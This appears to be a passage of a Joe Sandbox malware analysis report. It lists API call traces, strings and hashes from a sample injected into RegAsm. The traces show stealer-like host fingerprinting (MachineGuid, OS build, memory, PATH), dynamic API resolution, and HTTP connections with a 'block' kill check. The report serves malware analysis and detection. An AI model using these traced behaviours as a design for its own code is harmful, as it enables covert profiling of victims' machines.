                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CharOpenQueryValuememset
                                                                                                                                                                                                                                        • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                        • API String ID: 1728412123-1211650757
                                                                                                                                                                                                                                        • Opcode ID: c5de048e1d1cde4379b446a0d5fa29705f724f43fda2a5672e90642c938baa44
                                                                                                                                                                                                                                        • Instruction ID: 734486b7100e6d63ed2b29b9d7cba1e03fbf9e6038e99d6900f302105bc7df50
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5de048e1d1cde4379b446a0d5fa29705f724f43fda2a5672e90642c938baa44
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8601B579640219ABD724DB90DC4AFE97778AB14704F104199B645621C0DAB46A858B50
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498), ref: 004106EE
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498,00000000), ref: 004106F5
                                                                                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410715
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 0041073B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                        • String ID: %d MB$@
                                                                                                                                                                                                                                        • API String ID: 3644086013-3474575989
                                                                                                                                                                                                                                        • Opcode ID: 5c15e8f739123b19d1baced4fe448482e4d8f3540cc7547e32c0a38f8f91194a
                                                                                                                                                                                                                                        • Instruction ID: 3858def785d9e4baa448147c13a215b95796b3cfcd3afa1d1fab1a2876bbce8c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c15e8f739123b19d1baced4fe448482e4d8f3540cc7547e32c0a38f8f91194a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3F09675A40118ABE7149BA4EC1AFFE77ADEB01701F500119F706D72C0DBB89C4587A9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
                                                                                                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE1
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2311089104-0
                                                                                                                                                                                                                                        • Opcode ID: 579c2fe795106ecf5eccca885b31128ca63010d2d47496a338ba6b2560c36b0f
                                                                                                                                                                                                                                        • Instruction ID: fca360b4b4926ce2ce86bd9a704f617748b4363ecef1e2cd769cd9a162bdc231
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 579c2fe795106ecf5eccca885b31128ca63010d2d47496a338ba6b2560c36b0f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F214CB560020AAFDB10DFA4DC84FAF77A9EB49714F10022AF912A72C0D7389D51CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(0145F6F0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,00000000,01461F20,?,00427A64,?,?,01462100,01462100,00427A5F,?), ref: 00407311
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52
                                                                                                                                                                                                                                        • SetEnvironmentVariableA.KERNEL32(0145F6F0,00000000,00000000,hzB,?,?,00427A68,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00427A63), ref: 0040738E
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00420658,000000FF,?,0040BE2B), ref: 004073A9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • hzB, xrefs: 00407349, 00407366, 0040734D
                                                                                                                                                                                                                                        • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040730B, 00407324
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                        • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;$hzB
                                                                                                                                                                                                                                        • API String ID: 2929475105-4148362473
                                                                                                                                                                                                                                        • Opcode ID: 31dd4db35a1bb3b1cce8a79840ee6e2a0866e1f6c2fd180dfcfd9305cc2df682
                                                                                                                                                                                                                                        • Instruction ID: 579015a8dc8e7fb9ba4dc0b4b2d1472570f0f46b00a7972d46a8666dc34995d3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 31dd4db35a1bb3b1cce8a79840ee6e2a0866e1f6c2fd180dfcfd9305cc2df682
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC71E570900249DEDB04EBE4D846BEEBBB9AF1A304F14417EF905672D1DF781A48C7A5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
                                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                        • String ID: fA$fA
                                                                                                                                                                                                                                        • API String ID: 4198075804-1630953348
                                                                                                                                                                                                                                        • Opcode ID: 4c7f4e472d745ab8cab7eb6f144f57fb864aedb4309a7d0810c75c658f687d6f
                                                                                                                                                                                                                                        • Instruction ID: 4a7e4500b8fefa130c25cbd9421f046c1ba1e46fcba1c1cc5636780b9c3006f8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c7f4e472d745ab8cab7eb6f144f57fb864aedb4309a7d0810c75c658f687d6f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40412D74801249EADB11EFA5C981BDDBBB4AB19304F50407EE906676C2DF781A4CCBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410F55
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00410F5C
                                                                                                                                                                                                                                          • Part of subcall function 00410200: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410215
                                                                                                                                                                                                                                          • Part of subcall function 00410200: HeapAlloc.KERNEL32(00000000), ref: 0041021C
                                                                                                                                                                                                                                          • Part of subcall function 00410200: RegOpenKeyExA.KERNEL32(80000002,0145A700,00000000,00020119,?), ref: 0041023B
                                                                                                                                                                                                                                          • Part of subcall function 00410200: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00410255
                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,0145A700,00000000,00020119,00000000), ref: 00410F91
                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,01461E78,00000000,00000000,00000000,000000FF), ref: 00410FAC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                        • String ID: Windows 11
                                                                                                                                                                                                                                        • API String ID: 3676486918-2517555085
                                                                                                                                                                                                                                        • Opcode ID: d43087b26c80f33632802deaa44fe005c08705709e3937b8f2a439f42bc598b2
                                                                                                                                                                                                                                        • Instruction ID: 53ce30e9246303524b4cf8f670f0acc819984a5071f51573bc99cb0a8d9a2c5a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d43087b26c80f33632802deaa44fe005c08705709e3937b8f2a439f42bc598b2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C701267860020AFBD714DBA0EC4EEABB7BDEB45B01F104159FA04D7250D6B45D80C7E0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410215
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041021C
                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,0145A700,00000000,00020119,?), ref: 0041023B
                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00410255
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                        • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                        • API String ID: 3676486918-1022791448
                                                                                                                                                                                                                                        • Opcode ID: 6f3398eec55eb66702cb792dadfb379ee1dfd6b4411625055140db05f208c69e
                                                                                                                                                                                                                                        • Instruction ID: 4c14057a90075943bc9431615e63d58b06497ca245fa930b3837fb80e640c4dc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f3398eec55eb66702cb792dadfb379ee1dfd6b4411625055140db05f208c69e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AF0AFB9540205BBE7109BA0EC4EFABBBADEF49B01F500155FA0596280E6B45A44C7B4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,01452840), ref: 00418CC5
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,014529E0), ref: 00418CDD
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145D9C0), ref: 00418CF6
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DBA0), ref: 00418D0E
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DA08), ref: 00418D26
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DA38), ref: 00418D3F
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,01453A38), ref: 00418D57
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DA50), ref: 00418D6F
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DB40), ref: 00418D88
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DB28), ref: 00418DA0
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DA68), ref: 00418DB8
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,01452A60), ref: 00418DD1
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,01452AE0), ref: 00418DE9
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,01452900), ref: 00418E01
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,01452920), ref: 00418E1A
                                                                                                                                                                                                                                          • Part of subcall function 00418CB0: GetProcAddress.KERNEL32(76210000,0145DB70), ref: 00418E32
                                                                                                                                                                                                                                          • Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,014625C8,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004181D6
                                                                                                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004181F0
                                                                                                                                                                                                                                          • Part of subcall function 00410D90: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
                                                                                                                                                                                                                                          • Part of subcall function 00410D90: GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
                                                                                                                                                                                                                                          • Part of subcall function 00410D90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
                                                                                                                                                                                                                                          • Part of subcall function 00410D90: HeapAlloc.KERNEL32(00000000), ref: 00410E54
                                                                                                                                                                                                                                          • Part of subcall function 00404490: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040455A
                                                                                                                                                                                                                                          • Part of subcall function 00404490: StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000000), ref: 0040457A
                                                                                                                                                                                                                                          • Part of subcall function 00412870: StrCmpCA.SHLWAPI(00000000,block,00000000,?,0041826A), ref: 004128A8
                                                                                                                                                                                                                                          • Part of subcall function 00412870: ExitProcess.KERNEL32 ref: 004128B3
                                                                                                                                                                                                                                          • Part of subcall function 00405C90: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D5A
                                                                                                                                                                                                                                          • Part of subcall function 00405C90: StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000000), ref: 00405D7A
                                                                                                                                                                                                                                          • Part of subcall function 004122F0: strtok_s.MSVCRT ref: 00412330
                                                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 004185E9
                                                                                                                                                                                                                                          • Part of subcall function 00405C90: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F04
                                                                                                                                                                                                                                          • Part of subcall function 00413930: strtok_s.MSVCRT ref: 0041396C
                                                                                                                                                                                                                                          • Part of subcall function 00413930: strtok_s.MSVCRT ref: 004139AE
                                                                                                                                                                                                                                          • Part of subcall function 00411DF0: memset.MSVCRT ref: 00411E2B
                                                                                                                                                                                                                                          • Part of subcall function 00405C90: HttpOpenRequestA.WININET(00000000,0145F8C0,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00405F44
                                                                                                                                                                                                                                          • Part of subcall function 00405C90: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405F6B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
